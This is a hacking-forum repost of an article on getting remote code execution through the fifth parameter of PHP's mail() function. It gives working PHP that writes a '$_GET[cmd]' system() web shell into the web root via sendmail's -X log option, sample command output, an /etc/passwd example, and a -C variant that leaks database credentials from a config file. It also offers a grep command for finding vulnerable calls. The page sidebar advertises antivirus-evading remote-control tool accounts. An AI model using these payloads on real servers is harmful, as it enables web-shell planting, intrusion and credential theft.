HACK80

我们很年轻,但我们有信念、有梦想!

我们坚信只有今天付出了,才有机会看到明天的太阳!
现在!加入我们,给你一个气氛优秀的技术圈子

作者: juk小乖
查看: 85|回复: 0

more +随机图赏Gallery

2017年中旬WEB渗透系列课程-19文件包含与目录遍历2017年中旬WEB渗透系列课程-19文件包含与目录遍历
2017年中旬WEB渗透系列课程-18上传绕过方法演示2017年中旬WEB渗透系列课程-18上传绕过方法演示
2017年中旬WEB渗透系列课程-17了解上传检测方式2017年中旬WEB渗透系列课程-17了解上传检测方式
2017年中旬WEB渗透系列课程-27HASH提权2017年中旬WEB渗透系列课程-27HASH提权
HACK80远控 免杀的 账号密码打包 每天都发账号 回帖要。可改密码!HACK80远控 免杀的 账号密码打包 每天都发账号 回帖要。可改密码!
2017年中旬WEB渗透系列课程-16解析漏洞演示2017年中旬WEB渗透系列课程-16解析漏洞演示
2017年中旬WEB渗透系列课程-15XSS绕过集合2017年中旬WEB渗透系列课程-15XSS绕过集合
2017年中旬WEB渗透系列课程-14XSS能干什么2017年中旬WEB渗透系列课程-14XSS能干什么
2017年中旬WEB渗透系列课程-13XSS漏洞检测2017年中旬WEB渗透系列课程-13XSS漏洞检测
2017年中旬WEB渗透系列课程-12XSS分析及演示2017年中旬WEB渗透系列课程-12XSS分析及演示

Exploit PHP’s mail() to get remote code execution

[复制链接]
juk小乖 发表于 2017-10-12 16:16:23 | 显示全部楼层 |阅读模式
查看: 85|回复: 0

马上注册,加入HACK80!与我们一起交流。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
Exploit PHP’s mail() function to perform remote code execution, under rare circumstances.
Advertisement:

Security Sucks wrote about an interesting way to exploit PHP’s mail() function for remote code execution. Apparently, if you are able to control the 5th parameter of the mail() function ($options), you have the opportunity to execute arbitrary commands.
As with other PHP vulnerabilities, like bypassing PHP’s strcmp() function or phpinfo() type confusion, they are -often- only possible under rare circumstances.
Nevertheless, as always it is very important to
check
your PHP code for this PHP mail() remote code execution vulnerability.
Verify and make sure your code is not vulnerable:
  1. grep -r -n --include "*.php" "mail(.*,.*,.*,.*,.*)" *
复制代码
For this mail() remote code execution to work, a malicious user has to be able to control what goes into the 5th parameter. For example through not properly validated email forms.
Update 2016-09-07:
Apparently, the securitysucks.info domain no longer exists and the post is unavailable. I’ve copied the full text below for you, please note this was released on securitysucks.info on September 3, 2014 and it may be outdated.
A recent example exploiting this PHP mail() remote code execution vulnerability is a command execution via email in Roundcube 1.2.2, discovered by RIPS Technologies. Roundcube posted a patch to GitHub at the end of November, and issued a version 1.2.3 here.
  1. Exploit PHP’s mail() to get remote code execution #
复制代码
While searching around the web for new nifty tricks I stumbled across this post about how to get remote code execution exploiting PHP’s mail() function. First, I must say that this is only going to happen under some really rare circustances. Never the less, it’s really something to think about and keep an eye out for. I will explain an example scenario which I think could be a real life scenario later in this article. So, when that’s said, let’s have a look at what this is all about. When using PHP to send emails we can use PHP’s built in function mail(). This function takes a total of five parameters.
  • To
  • Subject
  • Message
  • Headers (Optional)
  • Parameters (Optional)
This looks pretty innocent at first glance, but if this is used wrong it can be really bad. The parameter of interest is the 5th and last one, so let’s have a look at what the PHP manual has to say about it.
  1. The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option.
复制代码
This is really interesting. In short, this say that we can alter the behaviour of the sendmail application. Now, let’s have a look at the sendmail manual. I’m not going to post the entire manual here, but I will highlight some of the interesting parts.Some interesting parameters #
  1. -O option=value
  2. Set option option to the specified value. This form uses long names.

  3. -Cfile
  4. Use alternate configuration file. Sendmail gives up any enhanced (set-user-ID or set-group-ID) privileges if an alternate configuration file is specified.

  5. -X logfile
  6. Log all traffic in and out of mailers in the indicated log file. This should only be used as a last resort for debugging mailer bugs. It will log a lot of data very quickly.
复制代码
Some interesting options #
  1. QueueDirectory=queuedir
  2. Select the directory in which to queue messages.
复制代码
So how can this be exploited? #
Remote Code Execution #As stated above, this only occurs under very specific circumstances. For this to be exploitable, the user has to be able to control what goes into the 5th parameter, which does not make sense at all that anyone would do it. But it’s still something that really should be kept in mind by developers.With that said, let’s just dive into it!Interesting for you:  Deny vulnerable WordPress plugins using Windows Server File Server Resource Manager's File Screens

This is the code for exploiting the mail() function 
  1. <span class="token variable">$to</span> <span class="token operator">=</span> <span class="token string">'a@b.c'</span><span class="token punctuation">;</span>
  2. <span class="token variable">$subject</span> <span class="token operator">=</span> <span class="token string">'<span class="token delimiter"><?php</span> <span class="token function">system</span><span class="token punctuation">(</span><span class="token global">$_GET</span><span class="token punctuation">[</span>"cmd"<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token delimiter">?></span>'</span><span class="token punctuation">;</span>
  3. <span class="token variable">$message</span> <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">;</span>
  4. <span class="token variable">$headers</span> <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">;</span>
  5. <span class="token variable">$options</span> <span class="token operator">=</span> <span class="token string">'-OQueueDirectory=/tmp -X/var/www/html/rce.php'</span><span class="token punctuation">;</span>
  6. <span class="token function">mail</span><span class="token punctuation">(</span><span class="token variable">$to</span><span class="token punctuation">,</span> <span class="token variable">$subject</span><span class="token punctuation">,</span> <span class="token variable">$message</span><span class="token punctuation">,</span> <span class="token variable">$headers</span><span class="token punctuation">,</span> <span class="token variable">$options</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
复制代码
Let’s inspect the logs from this. First let’s have a look at what we can see in the browser by only going to the rce.php file
  1. 11226 <<< To: a@b.c
  2. 11226 <<< Subject: 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
  3. 11226 <<<
复制代码
Nothing really scary to see in this log. Now, let's use the cat command in the terminal on the same file 
  1. > cat rce.php
  2. 11226 <<< To: a@b.c
  3. 11226 <<< Subject:
  4. 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
  5. 11226 <<<
复制代码
See anything a bit more interesting? Let's try to execute some commands. I visit http://localhost/rce.php?cmd=ls%20-la and get the following output
  1. 11226 <<< To: a@b.c
  2. 11226 <<< Subject: total 20
  3. drwxrwxrwx 2 *** *** 4096 Sep 3 01:25 .
  4. drwxr-xr-x 4 *** www-data 4096 Sep 2 23:53 ..
  5. -rw-r--r-- 1 *** *** 92 Sep 3 01:12 config.php
  6. -rwxrwxrwx 1 *** *** 206 Sep 3 01:25 mailexploit.php
  7. -rw-r--r-- 1 www-data www-data 176 Sep 3 01:27 rce.php
  8. 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
  9. 11226 <<<
  10. 11226 <<<
  11. 11226 <<<
  12. 11226 <<< [EOF]
复制代码
Now, let me break it down in case you don't fully understand the code The first four variables is pretty straight forward. We set the recipient email address to some bogus address, then in the subject we inject the PHP code that will be executing our commands on the system, followed by empty message and headers. Then on the fith variable is where the magic happens. The $options variable holds a string that will let us write our malicious code get remote code execution to the server. First we change the mail queue directory to /tmp using the -O argument with the QueueDirectory option. The reason why we want it there is because this is globally writable. Second the path and filename for the log is changed to /var/www/html/rce.php using the -X argument. Keep in mind that this path will not always be the same. You will have to craft this to fit the targets file system. If we now point our browser at http://example.com/rce.php it will display the log for the attempted delivery. But since we added the PHP code to the $subject variable, we can now add the following query ?cmd=[some command here]. For example * http://example.com/rce.php?cmd=cat%20/etc/passwd*. If you want you could also create a Local/Remote File Inclusion vulnerability as well. To do this, just change system() to include(). This can be handy if wget is not available, or you're not able to include a remote web shell. It's also important to know, that it's not only the subject field that can be used to inject arbitrary code. The content of all the fields, except the fifth, is written to the log.
Read files on the server #Another way to exploit this is to directly read files on the server. This can be done by using the -C argument as shown above. I have made a dummy configuration file just to show how it works$to = 'a@b.c';
  1. <span class="token variable">$subject</span> <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">;</span>
  2. <span class="token variable">$message</span> <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">;</span>
  3. <span class="token variable">$headers</span> <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">;</span>
  4. <span class="token variable">$options</span> <span class="token operator">=</span> <span class="token string">'-C/var/www/html/config.php -OQueueDirectory=/tmp -X/var/www/html/evil.php'</span><span class="token punctuation">;</span>
  5. <span class="token function">mail</span><span class="token punctuation">(</span><span class="token variable">$to</span><span class="token punctuation">,</span> <span class="token variable">$subject</span><span class="token punctuation">,</span> <span class="token variable">$message</span><span class="token punctuation">,</span> <span class="token variable">$headers</span><span class="token punctuation">,</span> <span class="token variable">$options</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
复制代码
This creates a file named evil.php with the following content
  1. 11124 >>> /var/www/html/config.php: line 1: unknown configuration line "<?php"
  2. 11124 >>> /var/www/html/config.php: line 3: unknown configuration line "dbuser = 'someuser';"
  3. 11124 >>> /var/www/html/config.php: line 4: unknown configuration line "dbpass = 'somepass';"
  4. 11124 >>> /var/www/html/config.php: line 5: unknown configuration line "dbhost = 'localhost';"
  5. 11124 >>> /var/www/html/config.php: line 6: unknown configuration line "dbname = 'mydb';"
  6. 11124 >>> No local mailer defined
复制代码
Now we have managed to extract very sensitive data, and there's a lot of other things we can extract from the server.
A real-life scenario where this can become a reality #To be honest I actually had to think for this for a file. I mean, who would be so stupid that they let their users control the sendmail parameters. Well, it really doesn't have to be that stupid. So consider this following scenario. You have an admin panel for your website. Just like every other admin panel with respect for itself it let's your set different settings for sending emails. Stuff like port, smtp, etc. But not only that, this administration panel actually let's you monitor your mail logs, and you can decide where to store the logs. Suddenly the idea of the values of the 5th parameter being controlled by an end user doesn't sound that stupid anymore. You would of course not let this be modified from the contact form  But admins wouldn't hack their own site would they.. So in combination with other attacks that results in unauthorized access, this can become a real threat since you can actually create vulnerabilities that was not originally in the application
How to detect a possible vulnerability #The fastes way to detect any possibility for this in code is to use Linux's grep command, and recursively look for any use of mail() with all 5 parameters in use. Position yourself in the root of whatever project you want to check and execute the following command. This will return all code lines that uses mail() with five parameters.
  1. <span class="token function">grep</span> -r -n --include <span class="token string">"*.php"</span> <span class="token string">"mail(.*,.*,.*,.*,.*)"</span> *
复制代码
There will probably be some false positives, so if you have any suggestions to improve this to make it even more accurate, please let me know!
Summary #This is not something that you will stumble across often. To be honest I don't expect to ever see this in the wild at all, though it would be really cool to do so, but you never know as explained in the "real-life scenario" section. Still, I do find this to be really interesting, and it makes you think "what other PHP functions can do this?" I hope you enjoyed the article and if you have any comments you know what to do.
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|小黑屋|手机版|HACK80 ( 沪ICP备15007512号 )

GMT+8, 2017-12-17 12:23 , Processed in 0.063456 second(s), 24 queries .

Powered by Discuz! X3.4 © 2001-2013 Comsenz Inc.